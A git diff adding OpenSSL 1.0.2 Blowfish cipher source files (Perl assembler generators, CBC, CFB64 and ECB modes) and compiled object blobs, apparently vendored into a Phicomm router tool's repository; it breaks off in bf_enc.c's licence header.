+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/bf-586.pl
@@ -0,0 +1,137 @@
+#!/usr/local/bin/perl
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+require "cbc.pl";
+
+&asm_init($ARGV[0],"bf-586.pl",$ARGV[$#ARGV] eq "386");
+
+$BF_ROUNDS=16;
+$BF_OFF=($BF_ROUNDS+2)*4;
+$L="edi";
+$R="esi";
+$P="ebp";
+$tmp1="eax";
+$tmp2="ebx";
+$tmp3="ecx";
+$tmp4="edx";
+
+&BF_encrypt("BF_encrypt",1);
+&BF_encrypt("BF_decrypt",0);
+&cbc("BF_cbc_encrypt","BF_encrypt","BF_decrypt",1,4,5,3,-1,-1);
+&asm_finish();
+
+sub BF_encrypt
+	{
+	local($name,$enc)=@_;
+
+	&function_begin_B($name,"");
+
+	&comment("");
+
+	&push("ebp");
+	&push("ebx");
+	&mov($tmp2,&wparam(0));
+	&mov($P,&wparam(1));
+	&push("esi");
+	&push("edi");
+
+	&comment("Load the 2 words");
+	&mov($L,&DWP(0,$tmp2,"",0));
+	&mov($R,&DWP(4,$tmp2,"",0));
+
+	&xor(	$tmp1,	$tmp1);
+
+	# encrypting part
+
+	if ($enc)
+		{
+		 &mov($tmp2,&DWP(0,$P,"",0));
+		&xor(	$tmp3,	$tmp3);
+
+		&xor($L,$tmp2);
+		for ($i=0; $i<$BF_ROUNDS; $i+=2)
+			{
+			&comment("");
+			&comment("Round $i");
+			&BF_ENCRYPT($i+1,$R,$L,$P,$tmp1,$tmp2,$tmp3,$tmp4,1);
+
+			&comment("");
+			&comment("Round ".sprintf("%d",$i+1));
+			&BF_ENCRYPT($i+2,$L,$R,$P,$tmp1,$tmp2,$tmp3,$tmp4,1);
+			}
+		# &mov($tmp1,&wparam(0)); In last loop
+		&mov($tmp4,&DWP(($BF_ROUNDS+1)*4,$P,"",0));
+		}
+	else
+		{
+		 &mov($tmp2,&DWP(($BF_ROUNDS+1)*4,$P,"",0));
+		&xor(	$tmp3,	$tmp3);
+
+		&xor($L,$tmp2);
+		for ($i=$BF_ROUNDS; $i>0; $i-=2)
+			{
+			&comment("");
+			&comment("Round $i");
+			&BF_ENCRYPT($i,$R,$L,$P,$tmp1,$tmp2,$tmp3,$tmp4,0);
+			&comment("");
+			&comment("Round ".sprintf("%d",$i-1));
+			&BF_ENCRYPT($i-1,$L,$R,$P,$tmp1,$tmp2,$tmp3,$tmp4,0);
+			}
+		# &mov($tmp1,&wparam(0)); In last loop
+		&mov($tmp4,&DWP(0,$P,"",0));
+		}
+
+	&xor($R,$tmp4);
+	&mov(&DWP(4,$tmp1,"",0),$L);
+
+	&mov(&DWP(0,$tmp1,"",0),$R);
+	&function_end($name);
+	}
+
+sub BF_ENCRYPT
+	{
+	local($i,$L,$R,$P,$tmp1,$tmp2,$tmp3,$tmp4,$enc)=@_;
+
+	&mov(	$tmp4,		&DWP(&n2a($i*4),$P,"",0)); # for next round
+
+	&mov(	$tmp2,		$R);
+	&xor(	$L,		$tmp4);
+
+	&shr(	$tmp2,		16);
+	&mov(	$tmp4,		$R);
+
+	&movb(	&LB($tmp1),	&HB($tmp2));	# A
+	&and(	$tmp2,		0xff);		# B
+
+	&movb(	&LB($tmp3),	&HB($tmp4));	# C
+	&and(	$tmp4,		0xff);		# D
+
+	&mov(	$tmp1,		&DWP(&n2a($BF_OFF+0x0000),$P,$tmp1,4));
+	&mov(	$tmp2,		&DWP(&n2a($BF_OFF+0x0400),$P,$tmp2,4));
+
+	&add(	$tmp2,		$tmp1);
+	&mov(	$tmp1,		&DWP(&n2a($BF_OFF+0x0800),$P,$tmp3,4));
+
+	&xor(	$tmp2,		$tmp1);
+	&mov(	$tmp4,		&DWP(&n2a($BF_OFF+0x0C00),$P,$tmp4,4));
+
+	&add(	$tmp2,		$tmp4);
+	if (($enc && ($i != 16)) || ((!$enc) && ($i != 1)))
+		{ &xor(	$tmp1,		$tmp1); }
+	else
+		{
+		&comment("Load parameter 0 ($i) enc=$enc");
+		&mov($tmp1,&wparam(0));
+		} # In last loop
+
+	&xor(	$L,		$tmp2);
+	# delay
+	}
+
+sub n2a
+	{
+	sprintf("%d",$_[0]);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/bf-686.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/bf-686.pl
new file mode 100644
index 0000000..8e4c25f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/bf-686.pl
@@ -0,0 +1,127 @@
+#!/usr/local/bin/perl
+
+push(@INC,"perlasm","../../perlasm");
+require "x86asm.pl";
+require "cbc.pl";
+
+&asm_init($ARGV[0],"bf-686.pl");
+
+$BF_ROUNDS=16;
+$BF_OFF=($BF_ROUNDS+2)*4;
+$L="ecx";
+$R="edx";
+$P="edi";
+$tot="esi";
+$tmp1="eax";
+$tmp2="ebx";
+$tmp3="ebp";
+
+&des_encrypt("BF_encrypt",1);
+&des_encrypt("BF_decrypt",0);
+&cbc("BF_cbc_encrypt","BF_encrypt","BF_decrypt",1,4,5,3,-1,-1);
+
+&asm_finish();
+
+&file_end();
+
+sub des_encrypt
+	{
+	local($name,$enc)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	&comment("Load the 2 words");
+	&mov("eax",&wparam(0));
+	&mov($L,&DWP(0,"eax","",0));
+	&mov($R,&DWP(4,"eax","",0));
+
+	&comment("");
+	&comment("P pointer, s and enc flag");
+	&mov($P,&wparam(1));
+
+	&xor(	$tmp1,	$tmp1);
+	&xor(	$tmp2,	$tmp2);
+
+	# encrypting part
+
+	if ($enc)
+		{
+		&xor($L,&DWP(0,$P,"",0));
+		for ($i=0; $i<$BF_ROUNDS; $i+=2)
+			{
+			&comment("");
+			&comment("Round $i");
+			&BF_ENCRYPT($i+1,$R,$L,$P,$tot,$tmp1,$tmp2,$tmp3);
+
+			&comment("");
+			&comment("Round ".sprintf("%d",$i+1));
+			&BF_ENCRYPT($i+2,$L,$R,$P,$tot,$tmp1,$tmp2,$tmp3);
+			}
+		&xor($R,&DWP(($BF_ROUNDS+1)*4,$P,"",0));
+
+		&mov("eax",&wparam(0));
+		&mov(&DWP(0,"eax","",0),$R);
+		&mov(&DWP(4,"eax","",0),$L);
+		&function_end_A($name);
+		}
+	else
+		{
+		&xor($L,&DWP(($BF_ROUNDS+1)*4,$P,"",0));
+		for ($i=$BF_ROUNDS; $i>0; $i-=2)
+			{
+			&comment("");
+			&comment("Round $i");
+			&BF_ENCRYPT($i,$R,$L,$P,$tot,$tmp1,$tmp2,$tmp3);
+			&comment("");
+			&comment("Round ".sprintf("%d",$i-1));
+			&BF_ENCRYPT($i-1,$L,$R,$P,$tot,$tmp1,$tmp2,$tmp3);
+			}
+		&xor($R,&DWP(0,$P,"",0));
+
+		&mov("eax",&wparam(0));
+		&mov(&DWP(0,"eax","",0),$R);
+		&mov(&DWP(4,"eax","",0),$L);
+		&function_end_A($name);
+		}
+
+	&function_end_B($name);
+	}
+
+sub BF_ENCRYPT
+	{
+	local($i,$L,$R,$P,$tot,$tmp1,$tmp2,$tmp3)=@_;
+
+	&rotr(	$R,		16);
+	&mov(	$tot,		&DWP(&n2a($i*4),$P,"",0));
+
+	&movb(	&LB($tmp1),	&HB($R));
+	&movb(	&LB($tmp2),	&LB($R));
+
+	&rotr(	$R,		16);
+	&xor(	$L,		$tot);
+
+	&mov(	$tot,		&DWP(&n2a($BF_OFF+0x0000),$P,$tmp1,4));
+	&mov(	$tmp3,		&DWP(&n2a($BF_OFF+0x0400),$P,$tmp2,4));
+
+	&movb(	&LB($tmp1),	&HB($R));
+	&movb(	&LB($tmp2),	&LB($R));
+
+	&add(	$tot,		$tmp3);
+	&mov(	$tmp1,		&DWP(&n2a($BF_OFF+0x0800),$P,$tmp1,4)); # delay
+
+	&xor(	$tot,		$tmp1);
+	&mov(	$tmp3,		&DWP(&n2a($BF_OFF+0x0C00),$P,$tmp2,4));
+
+	&add(	$tot,		$tmp3);
+	&xor(	$tmp1,		$tmp1);
+
+	&xor(	$L,		$tot);					
+	# delay
+	}
+
+sub n2a
+	{
+	sprintf("%d",$_[0]);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/readme b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/readme
new file mode 100644
index 0000000..2385fa3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/asm/readme
@@ -0,0 +1,10 @@
+There are blowfish assembler generation scripts.
+bf-586.pl version is for the pentium and
+bf-686.pl is my original version, which is faster on the pentium pro.
+
+When using a bf-586.pl, the pentium pro/II is %8 slower than using
+bf-686.pl.  When using a bf-686.pl, the pentium is %16 slower
+than bf-586.pl
+
+So the default is bf-586.pl
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_cbc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_cbc.c
new file mode 100644
index 0000000..de827a1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_cbc.c
@@ -0,0 +1,135 @@
+/* crypto/bf/bf_cbc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/blowfish.h>
+#include "bf_locl.h"
+
+void BF_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
+                    const BF_KEY *schedule, unsigned char *ivec, int encrypt)
+{
+    register BF_LONG tin0, tin1;
+    register BF_LONG tout0, tout1, xor0, xor1;
+    register long l = length;
+    BF_LONG tin[2];
+
+    if (encrypt) {
+        n2l(ivec, tout0);
+        n2l(ivec, tout1);
+        ivec -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            BF_encrypt(tin, schedule);
+            tout0 = tin[0];
+            tout1 = tin[1];
+            l2n(tout0, out);
+            l2n(tout1, out);
+        }
+        if (l != -8) {
+            n2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            BF_encrypt(tin, schedule);
+            tout0 = tin[0];
+            tout1 = tin[1];
+            l2n(tout0, out);
+            l2n(tout1, out);
+        }
+        l2n(tout0, ivec);
+        l2n(tout1, ivec);
+    } else {
+        n2l(ivec, xor0);
+        n2l(ivec, xor1);
+        ivec -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin[0] = tin0;
+            tin[1] = tin1;
+            BF_decrypt(tin, schedule);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2n(tout0, out);
+            l2n(tout1, out);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        if (l != -8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin[0] = tin0;
+            tin[1] = tin1;
+            BF_decrypt(tin, schedule);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2nn(tout0, tout1, out, l + 8);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        l2n(xor0, ivec);
+        l2n(xor1, ivec);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_cfb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_cfb64.c
new file mode 100644
index 0000000..ddeab6e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_cfb64.c
@@ -0,0 +1,123 @@
+/* crypto/bf/bf_cfb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/blowfish.h>
+#include "bf_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit cfb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+
+void BF_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, const BF_KEY *schedule,
+                      unsigned char *ivec, int *num, int encrypt)
+{
+    register BF_LONG v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    BF_LONG ti[2];
+    unsigned char *iv, c, cc;
+
+    iv = (unsigned char *)ivec;
+    if (encrypt) {
+        while (l--) {
+            if (n == 0) {
+                n2l(iv, v0);
+                ti[0] = v0;
+                n2l(iv, v1);
+                ti[1] = v1;
+                BF_encrypt((BF_LONG *)ti, schedule);
+                iv = (unsigned char *)ivec;
+                t = ti[0];
+                l2n(t, iv);
+                t = ti[1];
+                l2n(t, iv);
+                iv = (unsigned char *)ivec;
+            }
+            c = *(in++) ^ iv[n];
+            *(out++) = c;
+            iv[n] = c;
+            n = (n + 1) & 0x07;
+        }
+    } else {
+        while (l--) {
+            if (n == 0) {
+                n2l(iv, v0);
+                ti[0] = v0;
+                n2l(iv, v1);
+                ti[1] = v1;
+                BF_encrypt((BF_LONG *)ti, schedule);
+                iv = (unsigned char *)ivec;
+                t = ti[0];
+                l2n(t, iv);
+                t = ti[1];
+                l2n(t, iv);
+                iv = (unsigned char *)ivec;
+            }
+            cc = *(in++);
+            c = iv[n];
+            iv[n] = cc;
+            *(out++) = c ^ cc;
+            n = (n + 1) & 0x07;
+        }
+    }
+    v0 = v1 = ti[0] = ti[1] = t = c = cc = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_cfb64.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_cfb64.o
new file mode 100644
index 0000000000000000000000000000000000000000..9e8a2050554a451d02948bd902fe52c36e5a01ce
GIT binary patch
literal 1992
zcmbtU&2JJx6dwvLwXF*^jbf^X!)h?v4YW<aOd5s)UCe3|3wlu80tGQGw1FkIrqKgx
z*kaXxz{Gg+Ptb!&lh$Z7_Ttf_7r!ok#Dg)xH@h=s!R^Jq<mJ8hoA-P3X6EhQ3`yY@
ziv=;Upm9`>7>ZEER`>my>qmQ07y98i@*7`>s5N{(qHf{X8TBoWM%14%NqsRbmcM#%
z_28^nwH@^UNmPTp%eOAB+4h%L_!%Uwt?*7!wegNy&tX{_<-vOf-tG6Lp=u0C>Mv1U
z;oBXr)hO?*#%!9?^O5Xd1w^dsi!l=Qz+%iMrrzOIN2In{+Yl|EBej?15BB~JT#@)%
zrQ^%P-4uR<R}av_pY+21RbQps_Z?TFd`&vV^QA{vjU%xNr<@fB^fN21TDxL-({nM7
zFX1@8jO7h9IWaNj_QaB<yi#(H3Il?-&o^AsLf?&kuiza#uEXT4AmsX;psk>jXJe=Z
zp>={;L5cL}23fA3LzX3{rMJu8{s10Q0{jqN8zv7M=A8FiLY(WKHN?5sY$48bw>8Ll
z@3aNEk+MC=%~(4v+z95pnDYcUcYt#RIA?%sr!{smq_hovtC_7^O(%-<&bn`8S+&zP
zVkEMnwtqnlx9@<PcWu>fv60dR;XXs3+Fb#57?j+5vkU-WhL7)nqhv--Ws*aKLJ9@K
zx+|yislxK2g5*hQDu5+<Djc2;Mdc_CNFkY|Z70Y@C6StwQ`tE=lejvMP>D7~W}p-F
zPfeGt9dMq0)FhvrmF2r>KFkxDsk#Wo<(!g8BB7`hbem;fAw8cEl=PB<gxQ3WKti%u
zL_%sImrLgX%P%Nt0cNyM>zT$^@+D!hu&|geD9cFDDx|Y=rjW>`>wE6Pa|4$gv3WxL
zfDvKusYiM)^NH;RC3oWoHOf;uq9O%5z><B~WVtAQjN;7`eU08bP1`oj@JU!9HUF3I
z11_oQ1vLuW|AY|)pY6}=m;p1UK4u9<&?NUXVB{-om?4OtP`(>{qp<s9SP~qP+RT4N
z`B|1oZ8JX(xY_%$UkQ6B@_vNN_zXAOn{4H!4UNz~$hWq~gio;Mw*v@eDL6#}gV1u@
TNH=(9d>1(s2z>Gl(#-!0L6Y#c

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ecb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ecb.c
new file mode 100644
index 0000000..967a7f5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ecb.c
@@ -0,0 +1,100 @@
+/* crypto/bf/bf_ecb.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/blowfish.h>
+#include "bf_locl.h"
+#include <openssl/opensslv.h>
+
+/*
+ * Blowfish as implemented from 'Blowfish: Springer-Verlag paper' (From
+ * LECTURE NOTES IN COMPUTER SCIENCE 809, FAST SOFTWARE ENCRYPTION, CAMBRIDGE
+ * SECURITY WORKSHOP, CAMBRIDGE, U.K., DECEMBER 9-11, 1993)
+ */
+
+const char BF_version[] = "Blowfish" OPENSSL_VERSION_PTEXT;
+
+const char *BF_options(void)
+{
+#ifdef BF_PTR
+    return ("blowfish(ptr)");
+#elif defined(BF_PTR2)
+    return ("blowfish(ptr2)");
+#else
+    return ("blowfish(idx)");
+#endif
+}
+
+void BF_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                    const BF_KEY *key, int encrypt)
+{
+    BF_LONG l, d[2];
+
+    n2l(in, l);
+    d[0] = l;
+    n2l(in, l);
+    d[1] = l;
+    if (encrypt)
+        BF_encrypt(d, key);
+    else
+        BF_decrypt(d, key);
+    l = d[0];
+    l2n(l, out);
+    l = d[1];
+    l2n(l, out);
+    l = d[0] = d[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ecb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ecb.o
new file mode 100644
index 0000000000000000000000000000000000000000..d6aef0b9a7af377e86005d1e4969b62448acc175
GIT binary patch
literal 2240
zcmbtUPj3=Y5Px*Hf?9zZ55^j^2Q+Q88<y6;2c=M8(-5oDCMKG!3oJrfSX>qb4|*UT
z2r=<v_!Yc0sfYRnJbSZ=UQBPsq|WTVf$e5{(MjI^W`1vG-rITe-rHO;KNSiwk`TMg
zCKj=P(-S@IsA(2sQFai!^jm%JOzxsyQiliX@T)rb8Lz4%@$x+Qs>9VpMA;dI-+hVg
z4aLN$AgaUfpsprFJG_tCeoQ+s5)(iRBbWfpiYjQ4s=DOnv0W#1@Hzfux4dn>sx><G
z`9`(3;A|-Hli_YsTeob<tV!!_qg5&uB}GokDJhkb*7TN?N-EbGD`c~Gr1{Nqw`F&w
z+wzi}TvTp$9aDLeO3KOQ1($}EL>O@x_~(WDn{0})9pnTUDCb;Yq1TUCs22~-&4eQ#
zps*Nok<ZO=lmL@lZzATR@xjzuRGNAkjju!_d@2y|tVH(fFlbT;K1tXk?eb`p;QZB5
z4lTiZ_?~Hjo$y!_Rbate7TC#&lSdQSDUao<F5_uBkB7j*9?Ml@0B1e_OSQegd9t1Q
z0*5VwXW^H7Km_q?$MBoS@HOCPJ@vT?wj<@5W>m^@g~`Qil4bIm*|r;ItAi>`Xhy4I
z_1iYn3dQxzN>N+S=S#T_ZDS=<%xR7jcL4vY!F{!ktyi|RN_|VK>5Xl4dudo5$V<yo
z#h_1}YX3QOCCeSKcd>@V<Nu;ipA&Dow8PJWPQ1i<%#VX)nJdK8IWW1?Z`yhp(6(Hx
zlV%y)x@;Rgo5@w()|p)HbeL?JXrQ|yD`YacVm6yb3tU^KZOCvH7oA#g`+2J?w=J`6
zSau&`FtJhBYL?zKXovrY5`^O&^xuRua43Bj#$W&2ItMdY<Mi0WRrdK6ea3mL8^+Sj
zI?wqlocG`8Pki1F{`Iec1LpkKcm-lHX9|W_X#J>{1fA9=OmoiLGZ^v>KOp0K<C;w3
zNT7m(x#;~Q{xn~}A5ZHNKIHKfM|guAh~Vg_b>Q)C`S*W|J4!r`fX<I>><@JH$3N!r
z56F?DKi&pDsDD%>L8va+Klr9nJoQh|+8FndufNCf3~-pkACE7(zjuIQZBD*G!y`Q1
Tn87zBD89${KNx$uia-7@Ds9sN

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_enc.c
new file mode 100644
index 0000000..b268795
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_enc.c
@@ -0,0 +1,300 @@
+/* crypto/bf/bf_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
